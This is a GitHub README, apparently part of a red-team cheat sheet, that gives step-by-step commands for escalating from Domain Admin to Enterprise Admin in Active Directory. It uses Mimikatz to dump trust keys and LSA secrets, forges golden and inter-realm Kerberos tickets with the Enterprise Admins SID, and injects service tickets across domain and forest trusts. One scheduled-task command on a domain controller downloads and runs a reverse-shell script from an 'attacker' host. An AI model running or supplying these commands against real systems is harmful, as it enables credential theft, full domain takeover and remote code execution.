Skip to content

Latest commit

 

History

History
64 lines (57 loc) · 2.54 KB

README.md

File metadata and controls

64 lines (57 loc) · 2.54 KB
Raw

DA TO EA - Domain Trust Key

$sess = New-PSSession -ComputerName DC01.domain.local
Enter-PSSession -Session $sess
# EP + AMSI BYPASS + EXIT
Invoke-Command -FilePath C:\path\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Create the inter-realm TGT

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-x-x-x-x-x /sids:S-1-5-x-x-x-x-519 /rc4:00000000000000000000000000000000 /service:krbtgt /target:domain.local /ticket:C:\path\trust_tkt.kirbi"'

Create the TGS for service in parent domain

.\asktgs.exe C:\path\trust_tkt.kirbi CIFS/DC01.domain.local
.\kirbikator.exe lsa .\CIFS.DC01.domain.local.kirbi

DA TO EA - KRBTGT Hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-x-x-x-x /sids:S-1-5-x-x-x-x-519 /krbtgt:00000000000000000000000000000000 /ticket:C:\path\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\krbtgt_tkt.kirbi"'
schtasks /create /S DC01.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "taskname" /TR "powershell.exe -c 'iex (New-ObjectNet.WebClient).DownloadString(''http://attacker/Invoke-PowerShellTcpEx.ps1''')'"
# SET UP YOU LISTENER
schtasks /Run /S DC01.domain.local /TN "taskname"

Acces Share test.domain.local to domain2.local forest

# KEYS
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
# TGT
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:test.domain.local /sid:S-1-5-x-x-x-x /rc4:00000000000000000000000000000000 /service:krbtgt /domain.local /ticket:C:\path\trust_forest_tkt.kirbi"'
# TGS for a service (CIFS)
.\asktgs.exe C:\path\trust_forest_tkt.kirbi CIFS/DC01.domain2.local
# Present the TGS to the service (CIFS)
.\kirbikator.exe lsa .\CIFS.DC01.domain2.local.kirbi

ℹ️ Well-known security identifiers. (S-1-5-21domain)

Property flag Value in hexadecimal
500 Administrator
501 Guest
502 KRBTGT
512 Domain Admins
513 Domain Users
514 Domain Guests
515 Domain Computers
516 Domain Controllers
517 Cert Publishers
518 Schema Admins
519 Enterprise Admins
520 Group Policy Creator Owners
526 Key Admins
527 Enterprise Key Admins
553 RAS and IAS Servers

<- BACK TO MAIN MENU ->